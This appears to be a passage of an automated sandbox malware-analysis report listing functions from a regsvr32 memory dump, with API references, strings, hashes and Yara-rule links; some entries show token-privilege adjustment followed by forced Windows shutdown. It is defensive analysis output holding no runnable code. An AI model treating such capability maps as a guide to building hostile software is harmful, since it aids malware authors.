Opcode Fuzzy Hash: 9d849a486a771a2ba975f60ce01952f084c2181aa9eeb1ca35fe4748fd4a6f39
Instruction Fuzzy Hash: 4E318332690B808ADB109F65D8487A9BBA6F744BECF58A615EF6E47F94DB38C401C710

Function 02E5B0BC Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E5B0F5

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

Part of subcall function 02E5AE80: _getptd.LIBCMT ref: 02E5AEBA

Part of subcall function 02E5A7E0: malloc.LIBCMT ref: 02E5A80B
Part of subcall function 02E5A7E0: Sleep.KERNEL32 ref: 02E5A81E

free.LIBCMT ref: 02E5B352
free.LIBCMT ref: 02E5B389
free.LIBCMT ref: 02E5B396

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$_getptd$Sleep_amsg_exitmalloc
String ID:
API String ID: 1310838139-0
Opcode ID: 82d67bd4074a8292135078b0dbf5279acc9a43100bda11809bbff80ac0b4c86f
Instruction ID: 54e067e6bbe36475e3c95ae28a9ed04fab8eb9a9bbb14bb0619bec9bb968cfa9
Opcode Fuzzy Hash: 82d67bd4074a8292135078b0dbf5279acc9a43100bda11809bbff80ac0b4c86f
Instruction Fuzzy Hash: C691DE322657949ACB24DF26E58479EB7A1F78878CF50912AEF4E47B18EF38D055CB00

Function 02E6BD50 Relevance: 5.8, Strings: 4, Instructions: 795COMMONLIBRARYCODE

Download Yara Rule

Strings

1#IND, xrefs: 02E6BE7F
1#SNAN, xrefs: 02E6BE3A
1#QNAN, xrefs: 02E6BEED
1#INF, xrefs: 02E6BEB6

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID:
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 0-2761157908
Opcode ID: 88125a201e65d8ed1bd1aa500e04f75a90837a246ad31d7ce44a8951280eefc8
Instruction ID: b7cf5a35565c4b4eb94f26ad177d75a59795434ad6ff1ae90347c8589a792ecf
Opcode Fuzzy Hash: 88125a201e65d8ed1bd1aa500e04f75a90837a246ad31d7ce44a8951280eefc8
Instruction Fuzzy Hash: 7652FF77BA46908BE724CFB5C018BBD37B2B75478CB50F01ADE86A7A48E7348515CB44

Function 02E60A00 Relevance: 4.7, APIs: 3, Instructions: 207COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E60A21
_invalid_parameter_noinfo.LIBCMT ref: 02E60A2D
_errno.LIBCMT ref: 02E60A5A

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 5302ddf32cfdaea319d3eae1ccb86372f1c86f96e15f9b218755445e13fbde08
Instruction ID: dbf226c8e3b284f7c65f4d5a59784a1105af7086648ff055e363a63ba6749fdb
Opcode Fuzzy Hash: 5302ddf32cfdaea319d3eae1ccb86372f1c86f96e15f9b218755445e13fbde08
Instruction Fuzzy Hash: 9E610AB2B5164A4BCF1C8F28DC657746656B798788F48E136EA0A8F798F73CE6018740

Function 02E63650 Relevance: 4.7, APIs: 3, Instructions: 199fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 02E6368A

Part of subcall function 02E62988: _errno.LIBCMT ref: 02E62991
Part of subcall function 02E62988: _invalid_parameter_noinfo.LIBCMT ref: 02E6299C

ReadFile.KERNEL32 ref: 02E63777

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: FileRead_errno_fileno_invalid_parameter_noinfo
String ID:
API String ID: 1416837532-0
Opcode ID: 309e42a65739554cb7027ffa9ae403e92d91995be6d779599bdefef1943cc8b0
Instruction ID: f2aed23356c4ca1f8ceb805a1476cfab2a204f5fc69fce97dad44459661820a6
Opcode Fuzzy Hash: 309e42a65739554cb7027ffa9ae403e92d91995be6d779599bdefef1943cc8b0
Instruction Fuzzy Hash: F671BB227C5A849ADB21CE25D44C3BA6B61F740FDCF48E59AEE4A07B98DB39D081C700

Function 02E66020 Relevance: 4.6, APIs: 3, Instructions: 70COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E66042

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

GetLocaleInfoA.KERNEL32 ref: 02E66077

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: InfoLocale_amsg_exit_getptd
String ID:
API String ID: 488165793-0
Opcode ID: 7a4bdbe237ab676890a3ead7a57c4d4f21b5585354efe19da6d086acf39470f5
Instruction ID: 38c962db6c7ea955eae8566de619373ad93480e2eb8927bf62576d9efe0335bc
Opcode Fuzzy Hash: 7a4bdbe237ab676890a3ead7a57c4d4f21b5585354efe19da6d086acf39470f5
Instruction Fuzzy Hash: 8121D232790AC197DB289B25E9093E9B3A6F7C8789F40A026D71E87644DF3CD464CB00

Function 028B6F6D Relevance: 4.1, Strings: 3, Instructions: 328COMMON

Download Yara Rule

Strings

n, xrefs: 028B7191
l, xrefs: 028B717F
., xrefs: 028B716D

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .$l$n
API String ID: 0-2376909228
Opcode ID: 6efd494f1771a83e1622dba27cf1971ef9d7551aafc06c164830ee9e4ee08136
Instruction ID: fb0f80af8188e57ce9739f4a9ca1c65ed77c7e3edc9a21bf8910386ddfd8c31b
Opcode Fuzzy Hash: 6efd494f1771a83e1622dba27cf1971ef9d7551aafc06c164830ee9e4ee08136
Instruction Fuzzy Hash: AAB1B038618B488FEB69EF68D8847EA73E2FF99304F00452ED54EC7261DB789544CB42

Function 02E6B4EC Relevance: 3.6, APIs: 2, Instructions: 613COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E6B54F
_invalid_parameter_noinfo.LIBCMT ref: 02E6B55A

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: ae4538f1a2572c5f67e6bc6f8f9159affb98521cd537506b2088318c8aa4d645
Instruction ID: b8877df39918db4e51f680b4572b93e2db1763e03e20d472be8b05db29039ab3
Opcode Fuzzy Hash: ae4538f1a2572c5f67e6bc6f8f9159affb98521cd537506b2088318c8aa4d645
Instruction Fuzzy Hash: C322EC76BD42848AEB248F69D098BFC3766B7107CCF84A01EDE46F7A95D7398546C700

Function 0287A30C Relevance: 3.2, APIs: 2, Instructions: 240COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_error_mode.LIBCMT ref: 0287A351
_set_error_mode.LIBCMT ref: 0287A362

Part of subcall function 0287DE90: _errno.LIBCMT ref: 0287DEAF
Part of subcall function 0287DE90: _invalid_parameter_noinfo.LIBCMT ref: 0287DEBB

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _set_error_mode$_errno_invalid_parameter_noinfo
String ID:
API String ID: 1239817535-0
Opcode ID: 44de1f721c027da7a128cc94a5ad70c9ea0fd816ea6c17f66893cfbd735dff7b
Instruction ID: c0e95c700d8fbf74322cf6bbd6ebe93c66c05e0a958a3dcee7fba8e29f83c910
Opcode Fuzzy Hash: 44de1f721c027da7a128cc94a5ad70c9ea0fd816ea6c17f66893cfbd735dff7b
Instruction Fuzzy Hash: F751C13D218A484BDB6CEF28A85966E73D6EB94304F00852EE89FC3191DF35D5068A47

Function 028BAA19 Relevance: 3.2, APIs: 2, Instructions: 240COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_error_mode.LIBCMT ref: 028BAA5E
_set_error_mode.LIBCMT ref: 028BAA6F

Part of subcall function 028BE59D: _errno.LIBCMT ref: 028BE5BC
Part of subcall function 028BE59D: _invalid_parameter_noinfo.LIBCMT ref: 028BE5C8

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _set_error_mode$_errno_invalid_parameter_noinfo
String ID:
API String ID: 1239817535-0
Opcode ID: 44de1f721c027da7a128cc94a5ad70c9ea0fd816ea6c17f66893cfbd735dff7b
Instruction ID: 343f4dfd7aaa0060925a9333a7fd5d8ba7477544a26896c74f272c9bf64959dd
Opcode Fuzzy Hash: 44de1f721c027da7a128cc94a5ad70c9ea0fd816ea6c17f66893cfbd735dff7b
Instruction Fuzzy Hash: 5851D53D318A494FA72EEF2CA8952AE73D6EF88305F40452ED49FC3291DF34C5068A46

Function 02E60414 Relevance: 3.2, APIs: 2, Instructions: 235COMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 02E60686

Part of subcall function 02E60D00: _errno.LIBCMT ref: 02E60D09
Part of subcall function 02E60D00: _invalid_parameter_noinfo.LIBCMT ref: 02E60D14

_get_daylight.LIBCMT ref: 02E6070C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _get_daylight$_errno_invalid_parameter_noinfo
String ID:
API String ID: 3559991230-0
Opcode ID: 52ea9ba5fbf5ede55e2a5c23ec7a03d404610338de9f7afb62735d1d5f3e1368
Instruction ID: 951a1928978d74b3a79b6318f063685329c41262bb29d1b2d88084d047dbf290
Opcode Fuzzy Hash: 52ea9ba5fbf5ede55e2a5c23ec7a03d404610338de9f7afb62735d1d5f3e1368
Instruction Fuzzy Hash: CC812872B942654BD72CCF29ED597A86756F3D8388F44E135EA06CBB94E738E600CB40

Function 02E65BD8 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E65BFF

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

GetLocaleInfoA.KERNEL32 ref: 02E65C34

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: InfoLocale_amsg_exit_getptd
String ID:
API String ID: 488165793-0
Opcode ID: a79cb05d7a59cd07edb9214c990442f87c4db8d832ef21515e078df8ae412a83
Instruction ID: 4fcc714ff33b80ebab7d1673285cb768649a7542f07548ab53ec81a475642ea7
Opcode Fuzzy Hash: a79cb05d7a59cd07edb9214c990442f87c4db8d832ef21515e078df8ae412a83
Instruction Fuzzy Hash: 8911D332380BC096DB28CF25E8493EA73A2F388BC8F849122DB5D87714DB38D455CB00

Function 02E4E097 Relevance: 3.0, APIs: 2, Instructions: 23shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 02E48BE0: GetModuleFileNameW.KERNEL32 ref: 02E48C0B
Part of subcall function 02E48BE0: GetCommandLineW.KERNEL32 ref: 02E48C11
Part of subcall function 02E48BE0: GetStartupInfoW.KERNEL32 ref: 02E48C1F
Part of subcall function 02E48BE0: CreateProcessW.KERNEL32 ref: 02E48C62
Part of subcall function 02E48BE0: ExitProcess.KERNEL32 ref: 02E48C6B

ExitProcess.KERNEL32 ref: 02E4E09F

Part of subcall function 02E492E0: GetCurrentProcess.KERNEL32 ref: 02E492F7
Part of subcall function 02E492E0: OpenProcessToken.ADVAPI32 ref: 02E4930A
Part of subcall function 02E492E0: LookupPrivilegeValueW.ADVAPI32 ref: 02E49335
Part of subcall function 02E492E0: AdjustTokenPrivileges.ADVAPI32 ref: 02E49358
Part of subcall function 02E492E0: GetLastError.KERNEL32 ref: 02E4935E
Part of subcall function 02E492E0: CloseHandle.KERNEL32 ref: 02E4936D

ExitWindowsEx.USER32 ref: 02E4E0B5

Part of subcall function 02E492E0: CloseHandle.KERNEL32 ref: 02E49388

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Process$Exit$CloseHandleToken$AdjustCommandCreateCurrentErrorFileInfoLastLineLookupModuleNameOpenPrivilegePrivilegesStartupValueWindows
String ID:
API String ID: 2667809516-0
Opcode ID: b3d21a28ab8203c73efd544b6153422eeffcacae9f052cfca13134f61e2c620e
Instruction ID: 897d0e1917247f2fefb07ed0b67912273814343e3e21c74b6ce6e991cd96b1db
Opcode Fuzzy Hash: b3d21a28ab8203c73efd544b6153422eeffcacae9f052cfca13134f61e2c620e
Instruction Fuzzy Hash: 59E086772C844085E729B734F9597AE7211BB507E4F05D1274E5F02D85CE3CC0D6C604

Function 02876F70 Relevance: 2.7, Strings: 2, Instructions: 239COMMON

Download Yara Rule

Strings

<, xrefs: 02876FFE
<, xrefs: 02876FF7

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID:
String ID: <$<
API String ID: 0-213342407
Opcode ID: 77b38b1c0ac415f03eb8fc3fe946db26220d3f2080d76b3f88013ad276a94d8a
Instruction ID: 97a10d7cc72c3ca2b7878a8389b00d20fa211c70ec47748f278e46729ef48f40
Opcode Fuzzy Hash: 77b38b1c0ac415f03eb8fc3fe946db26220d3f2080d76b3f88013ad276a94d8a
Instruction Fuzzy Hash: 919119B4618B198FDB98DF28D4983953BE5FB48704F1482BEAC4ECE25ADB748541CF90

Function 028B767D Relevance: 2.7, Strings: 2, Instructions: 239COMMON

Download Yara Rule

Strings

<, xrefs: 028B770B
<, xrefs: 028B7704

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <$<
API String ID: 0-213342407
Opcode ID: ec6654cddb8ab643111ea71d0f1c34bfd98507fc68d6e29d53a69cad8ac5ae5c
Instruction ID: 03b486865ac707b55d4f706c34fef0ded33aa6577674d160057d5575e87af8dc
Opcode Fuzzy Hash: ec6654cddb8ab643111ea71d0f1c34bfd98507fc68d6e29d53a69cad8ac5ae5c
Instruction Fuzzy Hash: 029128B4614B498FDBA9DF2894983953BE5FB48704F0482BEAC1ECE25ADB748541CF90

Function 02E42850 Relevance: 1.8, Strings: 1, Instructions: 599COMMON

Download Yara Rule

Strings

[RO] %ld bytes, xrefs: 02E4299A, 02E42EF8, 02E4305F

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID:
String ID: [RO] %ld bytes
API String ID: 0-772938740
Opcode ID: 0bc9ff0f179f0640927e28c222b33d2ac1d82dab54c563a82b986612fe2dcdf6
Instruction ID: ce97a6eeb484fcbcc25e88cfb09abb9e6e6100725ae67366d05fb118d3cf04da
Opcode Fuzzy Hash: 0bc9ff0f179f0640927e28c222b33d2ac1d82dab54c563a82b986612fe2dcdf6
Instruction Fuzzy Hash: 7D428B736092C48BC329CF29A44079EBBA0F355B48F44D12AEFC587B45DB78E995CB50

Function 02E5AE80 Relevance: 1.7, APIs: 1, Instructions: 156COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E5AEBA

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

Part of subcall function 02E5BA30: _errno.LIBCMT ref: 02E5BA48
Part of subcall function 02E5BA30: _invalid_parameter_noinfo.LIBCMT ref: 02E5BA54

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 1050512615-0
Opcode ID: fedb899bdb91596af6e6ee0e969ea8dc5925a75702ece9bdec94cea29fba6568
Instruction ID: 2c6eb9b33a3ebe870fc60d759e5a9bc9005450ab5f1eb602ce63688b80a1201a
Opcode Fuzzy Hash: fedb899bdb91596af6e6ee0e969ea8dc5925a75702ece9bdec94cea29fba6568
Instruction Fuzzy Hash: 4651D6623B46A186EF20DB22A55076BA756FB85BCCF44E425AF4A47B08EF38C005C700

Function 02E65CC0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 02E65CF4

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 57db738d57153fc7c429c22cf91e7162c30465e9021a82ee78624aa2695d2ded
Instruction ID: 546a5a13485c5a7ba8d367ce677d2e865d59ae3fe08f4dedd2b27b571ec417b7
Opcode Fuzzy Hash: 57db738d57153fc7c429c22cf91e7162c30465e9021a82ee78624aa2695d2ded
Instruction Fuzzy Hash: A601B5323D068186D7244B66E44C3BA3761F396BCCF99E421DF8A4B345CB34C582C740

Function 02E66150 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32 ref: 02E661A0

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: a806821e78272caffabb9aa5d16819259c944b66b3d383c3c5fc35bed0f95a7c
Instruction ID: 8e707db79669c2bef6bdbea3fe6304e7778babdbea8ad8413030a19bded9aeb7
Opcode Fuzzy Hash: a806821e78272caffabb9aa5d16819259c944b66b3d383c3c5fc35bed0f95a7c
Instruction Fuzzy Hash: 10018072AA07448BEB198F31D45D3BE37A5E754BCDF58A415CE0D02296CBBCC2A4CB91

Function 02E661E8 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32 ref: 02E6621D

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 877d5119e145bca4dbe67ff3c00607a04366f90a80b08fa67d988f9d8e585d44
Instruction ID: e1429267ebba128dbe9d77a34227d7b99d913b4ae905d8b080c9bad1ab6bb212
Opcode Fuzzy Hash: 877d5119e145bca4dbe67ff3c00607a04366f90a80b08fa67d988f9d8e585d44
Instruction Fuzzy Hash: BDF096B2BE464487EB188B35D45D3B63796E7E4B8DF18E011CA0D42295C77CC1A18641

Function 02E4E0E8 Relevance: 1.5, APIs: 1, Instructions: 18shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 02E492E0: GetCurrentProcess.KERNEL32 ref: 02E492F7
Part of subcall function 02E492E0: OpenProcessToken.ADVAPI32 ref: 02E4930A
Part of subcall function 02E492E0: LookupPrivilegeValueW.ADVAPI32 ref: 02E49335
Part of subcall function 02E492E0: AdjustTokenPrivileges.ADVAPI32 ref: 02E49358
Part of subcall function 02E492E0: GetLastError.KERNEL32 ref: 02E4935E
Part of subcall function 02E492E0: CloseHandle.KERNEL32 ref: 02E4936D

ExitWindowsEx.USER32 ref: 02E4E0F7

Part of subcall function 02E492E0: CloseHandle.KERNEL32 ref: 02E49388

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID:
API String ID: 681424410-0
Opcode ID: 7695e8de455b47fc7c4015bd84d56b1e415436a0ef6b3387a5f0b89aca7faf0b
Instruction ID: 304c62d107f0ddb352042f8cfa5fe5db7f9a0a078ccee767f3141d253da489bd
Opcode Fuzzy Hash: 7695e8de455b47fc7c4015bd84d56b1e415436a0ef6b3387a5f0b89aca7faf0b
Instruction Fuzzy Hash: 66D05B372C8444C5E766A735F4057DE7211B7947A4F45D1374E5E03981CE3880D6C704

Function 02E4E0C7 Relevance: 1.5, APIs: 1, Instructions: 18shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 02E492E0: GetCurrentProcess.KERNEL32 ref: 02E492F7
Part of subcall function 02E492E0: OpenProcessToken.ADVAPI32 ref: 02E4930A
Part of subcall function 02E492E0: LookupPrivilegeValueW.ADVAPI32 ref: 02E49335
Part of subcall function 02E492E0: AdjustTokenPrivileges.ADVAPI32 ref: 02E49358
Part of subcall function 02E492E0: GetLastError.KERNEL32 ref: 02E4935E
Part of subcall function 02E492E0: CloseHandle.KERNEL32 ref: 02E4936D

ExitWindowsEx.USER32 ref: 02E4E0D6

Part of subcall function 02E492E0: CloseHandle.KERNEL32 ref: 02E49388

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID:
API String ID: 681424410-0
Opcode ID: c5437afb9a504350283759be5a2e2ba688f67b11f6b02529b8aed3acffafb6b3
Instruction ID: 7c9dbb7a597bd312125cc58d7cbba7e3df4ad6e4053f489d6e9c5dfb9b0bb986
Opcode Fuzzy Hash: c5437afb9a504350283759be5a2e2ba688f67b11f6b02529b8aed3acffafb6b3
Instruction Fuzzy Hash: BDD05B37288440C5E766A775F4057DEB611B7947A4F45D1374E5E03981CE3880D6C704

Function 028B3A9D Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

0u, xrefs: 028B3C82

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0u
API String ID: 0-3203441087
Opcode ID: 84b7b3bca6920cc8a9683eb24846bb0459563868bb5748dfd0158d2d2b471ceb
Instruction ID: 94e0b6adee9b0353a05a905cd3f9dd33c2e4565403b3840317d3c5982722a0f3
Opcode Fuzzy Hash: 84b7b3bca6920cc8a9683eb24846bb0459563868bb5748dfd0158d2d2b471ceb
Instruction Fuzzy Hash: 1B915E7461CB488FD754EF28D8457AAB7E1FF98704F104A2EE58AC3260DB78E445CB86

Function 02E5AA5C Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

_.,, xrefs: 02E5AADC

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID:
String ID: _.,
API String ID: 0-2709443920
Opcode ID: 47e16563c84a19cc132468bc2d642e8892c0c44d7de91b2b25675d4158cb7711
Instruction ID: 15f2456e95176e08c8cdec68cb5c6b995a44aee428a4b1d04a0d0362c68e6d55
Opcode Fuzzy Hash: 47e16563c84a19cc132468bc2d642e8892c0c44d7de91b2b25675d4158cb7711
Instruction Fuzzy Hash: DF41F0322E4BA54AEF74DA71D92576A3713E384788F48E636EF4982B46EF69C140C740

Function 02872880 Relevance: .8, Instructions: 813COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f707a466f98fe272bde4ded02fca264932412dee6ff4484b5927f099e7d07fd
Instruction ID: 1cd166549fd41d1197fbff1471be0d2a35c59b614067be5b27ab2531364f3e97
Opcode Fuzzy Hash: 1f707a466f98fe272bde4ded02fca264932412dee6ff4484b5927f099e7d07fd
Instruction Fuzzy Hash: 0B527D346187858FD729CF1C84816A9BBE0FB59700F5489AEDCCACB746D770E846CB92

Function 028B2F8D Relevance: .8, Instructions: 813COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18e431d48e9aa25a0ba9b003567efa2638742ea5253fa4d3fbde3ac63ec74b8
Instruction ID: 6ab8e3824f45d905a589ab3531a50e06d0d9ce6577594eb4f348556356539c7f
Opcode Fuzzy Hash: b18e431d48e9aa25a0ba9b003567efa2638742ea5253fa4d3fbde3ac63ec74b8
Instruction Fuzzy Hash: 7D528034618B858FD72ACF1C8481699BBE1FF59700F5489ADD8CACB742D770E846CB92

Function 02E4B050 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d0b285a1c183d9ed15233d5e90f35ef3308b6f5fd0085757d0cf32db775e372
